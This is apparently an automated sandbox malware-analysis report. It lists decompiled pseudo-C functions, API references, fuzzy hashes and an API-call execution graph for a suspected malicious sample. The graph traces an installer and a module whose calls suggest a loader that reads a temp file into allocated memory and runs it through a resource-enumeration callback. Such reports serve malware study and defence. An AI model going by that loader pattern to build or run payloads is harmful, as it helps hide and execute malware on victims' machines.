                          				signed int _v8;
                          				int _v12;
                          				char _v16;
                          				intOrPtr _v24;
                          				char _v28;
                          				void* _v40;
                          				void* __ebx;
                          				void* __edi;
                          				signed int _t34;
                          				signed int _t40;
                          				int _t45;
                          				int _t52;
                          				void* _t53;
                          				void* _t55;
                          				int _t57;
                          				signed int _t63;
                          				int _t67;
                          				short* _t71;
                          				signed int _t72;
                          				short* _t73;
                          
                          				_t34 =  *0x412014; // 0x58c4579
                          				_v8 = _t34 ^ _t72;
                          				_push(_t53);
                          				E00403F2B(_t53,  &_v28, __edx, _a4);
                          				_t57 = _a24;
                          				if(_t57 == 0) {
                          					_t52 =  *(_v24 + 8);
                          					_t57 = _t52;
                          					_a24 = _t52;
                          				}
                          				_t67 = 0;
                          				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                          				_v12 = _t40;
                          				if(_t40 == 0) {
                          					L15:
                          					if(_v16 != 0) {
                          						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                          					}
                          					E004018CC();
                          					return _t67;
                          				}
                          				_t55 = _t40 + _t40;
                          				_t17 = _t55 + 8; // 0x8
                          				asm("sbb eax, eax");
                          				if((_t17 & _t40) == 0) {
                          					_t71 = 0;
                          					L11:
                          					if(_t71 != 0) {
                          						E00402460(_t67, _t71, _t67, _t55);
                          						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                          						if(_t45 != 0) {
                          							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                          						}
                          					}
                          					L14:
                          					E004063D5(_t71);
                          					goto L15;
                          				}
                          				_t20 = _t55 + 8; // 0x8
                          				asm("sbb eax, eax");
                          				_t47 = _t40 & _t20;
                          				_t21 = _t55 + 8; // 0x8
                          				_t63 = _t21;
                          				if((_t40 & _t20) > 0x400) {
                          					asm("sbb eax, eax");
                          					_t71 = E00403E3D(_t63, _t47 & _t63);
                          					if(_t71 == 0) {
                          						goto L14;
                          					}
                          					 *_t71 = 0xdddd;
                          					L9:
                          					_t71 =  &(_t71[4]);
                          					goto L11;
                          				}
                          				asm("sbb eax, eax");
                          				E004018E0();
                          				_t71 = _t73;
                          				if(_t71 == 0) {
                          					goto L14;
                          				}
                          				 *_t71 = 0xcccc;
                          				goto L9;
                          			}























                          0x004062c0
                          0x004062c7
                          0x004062ca
                          0x004062d3
                          0x004062d8
                          0x004062dd
                          0x004062e2
                          0x004062e5
                          0x004062e7
                          0x004062e7
                          0x004062ec
                          0x00406305
                          0x0040630b
                          0x00406310
                          0x004063af
                          0x004063b3
                          0x004063b8
                          0x004063b8
                          0x004063cc
                          0x004063d4
                          0x004063d4
                          0x00406316
                          0x00406319
                          0x0040631e
                          0x00406322
                          0x0040636e
                          0x00406370
                          0x00406372
                          0x00406377
                          0x0040638e
                          0x00406396
                          0x004063a6
                          0x004063a6
                          0x00406396
                          0x004063a8
                          0x004063a9
                          0x00000000
                          0x004063ae
                          0x00406324
                          0x00406329
                          0x0040632b
                          0x0040632d
                          0x0040632d
                          0x00406335
                          0x00406352
                          0x0040635c
                          0x00406361
                          0x00000000
                          0x00000000
                          0x00406363
                          0x00406369
                          0x00406369
                          0x00000000
                          0x00406369
                          0x00406339
                          0x0040633d
                          0x00406342
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406348
                          0x00000000

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                          • __alloca_probe_16.LIBCMT ref: 0040633D
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                          • __freea.LIBCMT ref: 004063A9
                            • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                          • String ID:
                          • API String ID: 313313983-0
                          • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                          • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                          • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                          • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00405751(signed int _a4) {
                          				signed int _t9;
                          				void* _t13;
                          				signed int _t15;
                          				WCHAR* _t22;
                          				signed int _t24;
                          				signed int* _t25;
                          				void* _t27;
                          
                          				_t9 = _a4;
                          				_t25 = 0x412fc8 + _t9 * 4;
                          				_t24 =  *_t25;
                          				if(_t24 == 0) {
                          					_t22 =  *(0x40cd48 + _t9 * 4);
                          					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                          					if(_t27 != 0) {
                          						L8:
                          						 *_t25 = _t27;
                          						if( *_t25 != 0) {
                          							FreeLibrary(_t27);
                          						}
                          						_t13 = _t27;
                          						L11:
                          						return _t13;
                          					}
                          					_t15 = GetLastError();
                          					if(_t15 != 0x57) {
                          						_t27 = 0;
                          					} else {
                          						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                          						_t27 = _t15;
                          					}
                          					if(_t27 != 0) {
                          						goto L8;
                          					} else {
                          						 *_t25 = _t15 | 0xffffffff;
                          						_t13 = 0;
                          						goto L11;
                          					}
                          				}
                          				_t4 = _t24 + 1; // 0x58c457a
                          				asm("sbb eax, eax");
                          				return  ~_t4 & _t24;
                          			}










                          0x00405756
                          0x0040575a
                          0x00405761
                          0x00405765
                          0x00405773
                          0x00405789
                          0x0040578d
                          0x004057b6
                          0x004057b8
                          0x004057bc
                          0x004057bf
                          0x004057bf
                          0x004057c5
                          0x004057c7
                          0x00000000
                          0x004057c8
                          0x0040578f
                          0x00405798
                          0x004057a7
                          0x0040579a
                          0x0040579d
                          0x004057a3
                          0x004057a3
                          0x004057ab
                          0x00000000
                          0x004057ad
                          0x004057b0
                          0x004057b2
                          0x00000000
                          0x004057b2
                          0x004057ab
                          0x00405767
                          0x0040576c
                          0x00000000

                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                          • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                          • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                          • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                          • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E00404320(void* __ebx, void* __ecx, void* __edx) {
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t2;
                          				void* _t3;
                          				void* _t4;
                          				intOrPtr _t9;
                          				void* _t11;
                          				void* _t20;
                          				void* _t21;
                          				void* _t23;
                          				void* _t25;
                          				void* _t27;
                          				void* _t29;
                          				void* _t31;
                          				void* _t32;
                          				long _t36;
                          				long _t37;
                          				void* _t40;
                          
                          				_t29 = __edx;
                          				_t23 = __ecx;
                          				_t20 = __ebx;
                          				_t36 = GetLastError();
                          				_t2 =  *0x412064; // 0x7
                          				_t42 = _t2 - 0xffffffff;
                          				if(_t2 == 0xffffffff) {
                          					L2:
                          					_t3 = E00403ECE(_t23, 1, 0x364);
                          					_t31 = _t3;
                          					_pop(_t25);
                          					if(_t31 != 0) {
                          						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                          						__eflags = _t4;
                          						if(_t4 != 0) {
                          							E00404192(_t25, _t31, 0x4132a4);
                          							E00403E03(0);
                          							_t40 = _t40 + 0xc;
                          							__eflags = _t31;
                          							if(_t31 == 0) {
                          								goto L9;
                          							} else {
                          								goto L8;
                          							}
                          						} else {
                          							_push(_t31);
                          							goto L4;
                          						}
                          					} else {
                          						_push(_t3);
                          						L4:
                          						E00403E03();
                          						_pop(_t25);
                          						L9:
                          						SetLastError(_t36);
                          						E00403E8B(_t20, _t29, _t31, _t36);
                          						asm("int3");
                          						_push(_t20);
                          						_push(_t36);
                          						_push(_t31);
                          						_t37 = GetLastError();
                          						_t21 = 0;
                          						_t9 =  *0x412064; // 0x7
                          						_t45 = _t9 - 0xffffffff;
                          						if(_t9 == 0xffffffff) {
                          							L12:
                          							_t32 = E00403ECE(_t25, 1, 0x364);
                          							_pop(_t27);
                          							if(_t32 != 0) {
                          								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                          								__eflags = _t11;
                          								if(_t11 != 0) {
                          									E00404192(_t27, _t32, 0x4132a4);
                          									E00403E03(_t21);
                          									__eflags = _t32;
                          									if(_t32 != 0) {
                          										goto L19;
                          									} else {
                          										goto L18;
                          									}
                          								} else {
                          									_push(_t32);
                          									goto L14;
                          								}
                          							} else {
                          								_push(_t21);
                          								L14:
                          								E00403E03();
                          								L18:
                          								SetLastError(_t37);
                          							}
                          						} else {
                          							_t32 = E00405878(_t25, _t45, _t9);
                          							if(_t32 != 0) {
                          								L19:
                          								SetLastError(_t37);
                          								_t21 = _t32;
                          							} else {
                          								goto L12;
                          							}
                          						}
                          						return _t21;
                          					}
                          				} else {
                          					_t31 = E00405878(_t23, _t42, _t2);
                          					if(_t31 != 0) {
                          						L8:
                          						SetLastError(_t36);
                          						return _t31;
                          					} else {
                          						goto L2;
                          					}
                          				}
                          			}





















                          0x00404320
                          0x00404320
                          0x00404320
                          0x0040432a
                          0x0040432c
                          0x00404331
                          0x00404334
                          0x00404342
                          0x00404349
                          0x0040434e
                          0x00404351
                          0x00404354
                          0x00404366
                          0x0040436b
                          0x0040436d
                          0x00404378
                          0x0040437f
                          0x00404384
                          0x00404387
                          0x00404389
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040436f
                          0x0040436f
                          0x00000000
                          0x0040436f
                          0x00404356
                          0x00404356
                          0x00404357
                          0x00404357
                          0x0040435c
                          0x00404397
                          0x00404398
                          0x0040439e
                          0x004043a3
                          0x004043a6
                          0x004043a7
                          0x004043a8
                          0x004043af
                          0x004043b1
                          0x004043b3
                          0x004043b8
                          0x004043bb
                          0x004043c9
                          0x004043d5
                          0x004043d8
                          0x004043db
                          0x004043ed
                          0x004043f2
                          0x004043f4
                          0x004043ff
                          0x00404405
                          0x0040440d
                          0x0040440f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004043f6
                          0x004043f6
                          0x00000000
                          0x004043f6
                          0x004043dd
                          0x004043dd
                          0x004043de
                          0x004043de
                          0x00404411
                          0x00404412
                          0x00404412
                          0x004043bd
                          0x004043c3
                          0x004043c7
                          0x0040441a
                          0x0040441b
                          0x00404421
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004043c7
                          0x00404428
                          0x00404428
                          0x00404336
                          0x0040433c
                          0x00404340
                          0x0040438b
                          0x0040438c
                          0x00404396
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404340

                          APIs
                          • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                          • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                          • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                          • _abort.LIBCMT ref: 0040439E
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_abort
                          • String ID:
                          • API String ID: 88804580-0
                          • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                          • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                          • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                          • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004025BA() {
                          				void* _t4;
                          				void* _t8;
                          
                          				E00402AE5();
                          				E00402A79();
                          				if(E004027D9() != 0) {
                          					_t4 = E0040278B(_t8, __eflags);
                          					__eflags = _t4;
                          					if(_t4 != 0) {
                          						return 1;
                          					} else {
                          						E00402815();
                          						goto L1;
                          					}
                          				} else {
                          					L1:
                          					return 0;
                          				}
                          			}





                          0x004025ba
                          0x004025bf
                          0x004025cb
                          0x004025d0
                          0x004025d5
                          0x004025d7
                          0x004025e2
                          0x004025d9
                          0x004025d9
                          0x00000000
                          0x004025d9
                          0x004025cd
                          0x004025cd
                          0x004025cf
                          0x004025cf

                          APIs
                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                            • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                          • String ID:
                          • API String ID: 1761009282-0
                          • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                          • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                          • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                          • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405575() {
                          
                          				 *0x412e78 = GetCommandLineA();
                          				 *0x412e7c = GetCommandLineW();
                          				return 1;
                          			}



                          0x0040557b
                          0x00405586
                          0x0040558d

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: CommandLine
                          • String ID: 3i
                          • API String ID: 3253501508-607397968
                          • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                          • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                          • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                          • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:14.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1257
                          Total number of Limit Nodes:24
                          execution_graph 4136 401cc1 GetDlgItem GetClientRect 4137 4029e8 18 API calls 4136->4137 4138 401cf1 LoadImageA SendMessageA 4137->4138 4139 40287d 4138->4139 4140 401d0f DeleteObject 4138->4140 4140->4139 4141 401dc1 4142 4029e8 18 API calls 4141->4142 4143 401dc7 4142->4143 4144 4029e8 18 API calls 4143->4144 4145 401dd0 4144->4145 4146 4029e8 18 API calls 4145->4146 4147 401dd9 4146->4147 4148 4029e8 18 API calls 4147->4148 4149 401de2 4148->4149 4150 401423 25 API calls 4149->4150 4151 401de9 ShellExecuteA 4150->4151 4152 401e16 4151->4152 4153 401ec5 4154 4029e8 18 API calls 4153->4154 4155 401ecc GetFileVersionInfoSizeA 4154->4155 4156 401eef GlobalAlloc 4155->4156 4163 401f45 4155->4163 4157 401f03 GetFileVersionInfoA 4156->4157 4156->4163 4158 401f14 VerQueryValueA 4157->4158 4157->4163 4159 401f2d 4158->4159 4158->4163 4164 4059e3 wsprintfA 4159->4164 4161 401f39 4165 4059e3 wsprintfA 4161->4165 4164->4161 4165->4163 4166 4014ca 4167 404e23 25 API calls 4166->4167 4168 4014d1 4167->4168 3525 403f4b lstrcpynA lstrlenA 3526 40604c 3532 405ed0 3526->3532 3527 40683b 3528 405f51 GlobalFree 3529 405f5a GlobalAlloc 3528->3529 3529->3527 3529->3532 3530 405fd1 GlobalAlloc 3530->3527 3530->3532 3531 405fc8 GlobalFree 3531->3530 3532->3527 3532->3528 3532->3529 3532->3530 3532->3531 2956 401f51 2957 401f63 2956->2957 2958 402004 2956->2958 2978 4029e8 2957->2978 2961 401423 25 API calls 2958->2961 2966 40215b 2961->2966 2962 4029e8 18 API calls 2963 401f73 2962->2963 2964 401f88 LoadLibraryExA 2963->2964 2965 401f7b GetModuleHandleA 2963->2965 2964->2958 2967 401f98 GetProcAddress 2964->2967 2965->2964 2965->2967 2968 401fe5 2967->2968 2969 401fa8 2967->2969 2999 404e23 2968->2999 2971 401fb0 2969->2971 2972 401fc7 2969->2972 2996 401423 2971->2996 2984 6f3a115e 2972->2984 2989 6f3a1070 GetTempPathW 2972->2989 2973 401fb8 2973->2966 2975 401ff8 FreeLibrary 2973->2975 2975->2966 2979 4029f4 2978->2979 3010 405aa7 2979->3010 2982 401f6a 2982->2962 2985 6f3a1167 2984->2985 2986 6f3a12ad EnumResourceTypesA 2985->2986 2987 6f3a1173 2985->2987 2988 6f3a12d3 2986->2988 2987->2973 3050 6f3a1000 2989->3050 2992 6f3a1167 2993 6f3a12ad EnumResourceTypesA 2992->2993 2994 6f3a1173 2992->2994 2995 6f3a12d3 2993->2995 2994->2973 2997 404e23 25 API calls 2996->2997 2998 401431 2997->2998 2998->2973 3000 404e3e 2999->3000 3008 404ee1 2999->3008 3001 404e5b lstrlenA 3000->3001 3002 405aa7 18 API calls 3000->3002 3003 404e84 3001->3003 3004 404e69 lstrlenA 3001->3004 3002->3001 3006 404e97 3003->3006 3007 404e8a SetWindowTextA 3003->3007 3005 404e7b lstrcatA 3004->3005 3004->3008 3005->3003 3006->3008 3009 404e9d SendMessageA SendMessageA SendMessageA 3006->3009 3007->3006 3008->2973 3009->3008 3016 405ab4 3010->3016 3011 405cca 3012 402a15 3011->3012 3045 405a85 lstrcpynA 3011->3045 3012->2982 3029 405ce3 3012->3029 3014 405b48 GetVersion 3028 405b55 3014->3028 3015 405ca1 lstrlenA 3015->3016 3016->3011 3016->3014 3016->3015 3018 405aa7 10 API calls 3016->3018 3023 405ce3 5 API calls 3016->3023 3043 4059e3 wsprintfA 3016->3043 3044 405a85 lstrcpynA 3016->3044 3018->3015 3021 405bc0 GetSystemDirectoryA 3021->3028 3022 405bd3 GetWindowsDirectoryA 3022->3028 3023->3016 3024 405aa7 10 API calls 3024->3028 3025 405c4a lstrcatA 3025->3016 3026 405c07 SHGetSpecialFolderLocation 3027 405c1f SHGetPathFromIDListA CoTaskMemFree 3026->3027 3026->3028 3027->3028 3028->3016 3028->3021 3028->3022 3028->3024 3028->3025 3028->3026 3038 40596c RegOpenKeyExA 3028->3038 3036 405cef 3029->3036 3030 405d5b CharPrevA 3032 405d57 3030->3032 3031 405d4c CharNextA 3031->3032 3031->3036 3032->3030 3033 405d76 3032->3033 3033->2982 3035 405d3a CharNextA 3035->3036 3036->3031 3036->3032 3036->3035 3037 405d47 CharNextA 3036->3037 3046 4055a3 3036->3046 3037->3031 3039 4059dd 3038->3039 3040 40599f RegQueryValueExA 3038->3040 3039->3028 3041 4059c0 RegCloseKey 3040->3041 3041->3039 3043->3016 3044->3016 3045->3012 3047 4055a9 3046->3047 3048 4055bc 3047->3048 3049 4055af CharNextA 3047->3049 3048->3036 3049->3047 3051 6f3a1015 CreateFileW GetFileSize VirtualAlloc ReadFile 3050->3051 3051->2992 4169 4014d6 4170 4029cb 18 API calls 4169->4170 4171 4014dc Sleep 4170->4171 4173 40287d 4171->4173 3540 401a58 3545 4029cb 3540->3545 3542 401a5f 3543 4029cb 18 API calls 3542->3543 3544 401a68 3543->3544 3546 405aa7 18 API calls 3545->3546 3547 4029df 3546->3547 3547->3542 3548 402858 SendMessageA 3549 402872 InvalidateRect 3548->3549 3550 40287d 3548->3550 3549->3550 4174 4018d8 4175 40190f 4174->4175 4176 4029e8 18 API calls 4175->4176 4177 401914 4176->4177 4178 4053aa 68 API calls 4177->4178 4179 40191d 4178->4179 3551 402259 3552 4029e8 18 API calls 3551->3552 3553 402267 3552->3553 3554 4029e8 18 API calls 3553->3554 3555 402270 3554->3555 3556 4029e8 18 API calls 3555->3556 3557 40227a GetPrivateProfileStringA 3556->3557 3558 40155b 3559 401577 ShowWindow 3558->3559 3560 40157e 3558->3560 3559->3560 3561 40158c ShowWindow 3560->3561 3562 40287d 3560->3562 3561->3562 4180 4018db 4181 4029e8 18 API calls 4180->4181 4182 4018e2 4181->4182 4183 405346 MessageBoxIndirectA 4182->4183 4184 4018eb 4183->4184 3563 404f61 3564 404f82 GetDlgItem GetDlgItem GetDlgItem 3563->3564 3565 40510d 3563->3565 3609 403e6c SendMessageA 3564->3609 3567 405116 GetDlgItem CreateThread CloseHandle 3565->3567 3568 40513e 3565->3568 3567->3568 3570 405169 3568->3570 3571 405155 ShowWindow ShowWindow 3568->3571 3572 40518b 3568->3572 3569 404ff3 3575 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 3569->3575 3573 4051c7 3570->3573 3577 4051a0 ShowWindow 3570->3577 3578 40517a 3570->3578 3614 403e6c SendMessageA 3571->3614 3618 403e9e 3572->3618 3573->3572 3584 4051d2 SendMessageA 3573->3584 3582 405069 3575->3582 3583 40504d SendMessageA SendMessageA 3575->3583 3580 4051c0 3577->3580 3581 4051b2 3577->3581 3615 403e10 3578->3615 3579 405199 3587 403e10 SendMessageA 3580->3587 3586 404e23 25 API calls 3581->3586 3588 40507c 3582->3588 3589 40506e SendMessageA 3582->3589 3583->3582 3584->3579 3590 4051eb CreatePopupMenu 3584->3590 3586->3580 3587->3573 3610 403e37 3588->3610 3589->3588 3591 405aa7 18 API calls 3590->3591 3593 4051fb AppendMenuA 3591->3593 3595 405221 3593->3595 3596 40520e GetWindowRect 3593->3596 3594 40508c 3597 405095 ShowWindow 3594->3597 3598 4050c9 GetDlgItem SendMessageA 3594->3598 3600 40522a TrackPopupMenu 3595->3600 3596->3600 3601 4050b8 3597->3601 3602 4050ab ShowWindow 3597->3602 3598->3579 3599 4050f0 SendMessageA SendMessageA 3598->3599 3599->3579 3600->3579 3603 405248 3600->3603 3613 403e6c SendMessageA 3601->3613 3602->3601 3604 405264 SendMessageA 3603->3604 3604->3604 3606 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3604->3606 3607 4052a3 SendMessageA 3606->3607 3607->3607 3608 4052c4 GlobalUnlock SetClipboardData CloseClipboard 3607->3608 3608->3579 3609->3569 3611 405aa7 18 API calls 3610->3611 3612 403e42 SetDlgItemTextA 3611->3612 3612->3594 3613->3598 3614->3570 3616 403e17 3615->3616 3617 403e1d SendMessageA 3615->3617 3616->3617 3617->3572 3619 403eb6 GetWindowLongA 3618->3619 3620 403f3f 3618->3620 3619->3620 3621 403ec7 3619->3621 3620->3579 3622 403ed6 GetSysColor 3621->3622 3623 403ed9 3621->3623 3622->3623 3624 403ee9 SetBkMode 3623->3624 3625 403edf SetTextColor 3623->3625 3626 403f01 GetSysColor 3624->3626 3627 403f07 3624->3627 3625->3624 3626->3627 3628 403f18 3627->3628 3629 403f0e SetBkColor 3627->3629 3628->3620 3630 403f32 CreateBrushIndirect 3628->3630 3631 403f2b DeleteObject 3628->3631 3629->3628 3630->3620 3631->3630 3632 403964 3633 403ab7 3632->3633 3634 40397c 3632->3634 3636 403b08 3633->3636 3637 403ac8 GetDlgItem GetDlgItem 3633->3637 3634->3633 3635 403988 3634->3635 3639 403993 SetWindowPos 3635->3639 3640 4039a6 3635->3640 3638 403b62 3636->3638 3646 401389 2 API calls 3636->3646 3641 403e37 19 API calls 3637->3641 3642 403e83 SendMessageA 3638->3642 3662 403ab2 3638->3662 3639->3640 3643 4039c3 3640->3643 3644 4039ab ShowWindow 3640->3644 3645 403af2 SetClassLongA 3641->3645 3669 403b74 3642->3669 3647 4039e5 3643->3647 3648 4039cb DestroyWindow 3643->3648 3644->3643 3649 40140b 2 API calls 3645->3649 3652 403b3a 3646->3652 3650 4039ea SetWindowLongA 3647->3650 3651 4039fb 3647->3651 3699 403dc0 3648->3699 3649->3636 3650->3662 3653 403a72 3651->3653 3654 403a07 GetDlgItem 3651->3654 3652->3638 3655 403b3e SendMessageA 3652->3655 3660 403e9e 8 API calls 3653->3660 3658 403a37 3654->3658 3659 403a1a SendMessageA IsWindowEnabled 3654->3659 3655->3662 3656 40140b 2 API calls 3656->3669 3657 403dc2 DestroyWindow EndDialog 3657->3699 3664 403a44 3658->3664 3667 403a8b SendMessageA 3658->3667 3668 403a57 3658->3668 3674 403a3c 3658->3674 3659->3658 3659->3662 3660->3662 3661 403df1 ShowWindow 3661->3662 3663 405aa7 18 API calls 3663->3669 3664->3667 3664->3674 3665 403e10 SendMessageA 3665->3653 3666 403e37 19 API calls 3666->3669 3667->3653 3670 403a74 3668->3670 3671 403a5f 3668->3671 3669->3656 3669->3657 3669->3662 3669->3663 3669->3666 3675 403e37 19 API calls 3669->3675 3690 403d02 DestroyWindow 3669->3690 3672 40140b 2 API calls 3670->3672 3673 40140b 2 API calls 3671->3673 3672->3674 3673->3674 3674->3653 3674->3665 3676 403bef GetDlgItem 3675->3676 3677 403c04 3676->3677 3678 403c0c ShowWindow EnableWindow 3676->3678 3677->3678 3700 403e59 EnableWindow 3678->3700 3680 403c36 EnableWindow 3681 403c4a 3680->3681 3682 403c4f GetSystemMenu EnableMenuItem SendMessageA 3681->3682 3701 403e6c SendMessageA 3681->3701 3702 405a85 lstrcpynA 3681->3702 3682->3681 3683 403c7f SendMessageA 3682->3683 3683->3681 3686 403cad lstrlenA 3687 405aa7 18 API calls 3686->3687 3688 403cbe SetWindowTextA 3687->3688 3689 401389 2 API calls 3688->3689 3689->3669 3691 403d1c CreateDialogParamA 3690->3691 3690->3699 3692 403d4f 3691->3692 3691->3699 3693 403e37 19 API calls 3692->3693 3694 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3693->3694 3695 401389 2 API calls 3694->3695 3696 403da0 3695->3696 3696->3662 3697 403da8 ShowWindow 3696->3697 3698 403e83 SendMessageA 3697->3698 3698->3699 3699->3661 3699->3662 3700->3680 3701->3681 3702->3686 3703 402164 3704 4029e8 18 API calls 3703->3704 3705 40216a 3704->3705 3706 4029e8 18 API calls 3705->3706 3707 402173 3706->3707 3708 4029e8 18 API calls 3707->3708 3709 40217c 3708->3709 3710 405d7c 2 API calls 3709->3710 3711 402185 3710->3711 3712 402196 lstrlenA lstrlenA 3711->3712 3713 402189 3711->3713 3715 404e23 25 API calls 3712->3715 3714 404e23 25 API calls 3713->3714 3717 402191 3713->3717 3714->3717 3716 4021d2 SHFileOperationA 3715->3716 3716->3713 3716->3717 4185 4019e6 4186 4029e8 18 API calls 4185->4186 4187 4019ef ExpandEnvironmentStringsA 4186->4187 4188 401a03 4187->4188 4190 401a16 4187->4190 4189 401a08 lstrcmpA 4188->4189 4188->4190 4189->4190 4191 4021e6 4192 4021ed 4191->4192 4195 402200 4191->4195 4193 405aa7 18 API calls 4192->4193 4194 4021fa 4193->4194 4196 405346 MessageBoxIndirectA 4194->4196 4196->4195 3718 401c6d 3719 4029cb 18 API calls 3718->3719 3720 401c73 IsWindow 3719->3720 3721 4019d6 3720->3721 4204 4025ed 4205 4025f4 